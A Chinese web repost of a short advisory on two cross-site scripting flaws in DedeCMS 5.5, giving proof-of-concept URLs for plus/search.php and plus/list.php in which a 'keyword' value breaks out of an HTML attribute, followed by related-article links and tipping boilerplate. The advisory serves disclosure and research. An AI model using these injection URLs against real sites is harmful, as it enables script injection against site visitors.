dedecms织梦 v5.5 两处跨站漏洞


本文整理自网络,侵删。

  影响版本:

  dedecms织梦5.5

  漏洞描述:

  demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2

  测试方法:

  本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=&PageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&TotalResult=&nativeplace=0&infotype=0&keyword=&orderby=hot&PageNo=2

  


标签:织梦DedeCMS

相关阅读 >>

详解织梦模板dedecms对discuz论坛的一些常用调用代码

php对外发包引发服务器崩溃的终极解决方法分享[推荐]

php备份数据库生成sql文件并下载的函数代码

dedecms无法保存远程图片到本地服务器的解决方法

dedecms实现有短标题时显示短标题、无短标题时显示长标题的方法

织梦后台文章列表中显示自定义字段的方法

dedecms任意页面调用栏目内容标签{dedefield.content}的方法

dede网站内容页如何调取栏目页标题及关键字组合为seo标题

dedecms织梦系统内容页英文字母不换行的解决方法

织梦DedeCMS经常被挂马问题的解决方法

更多相关阅读请进入《织梦DedeCMS》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...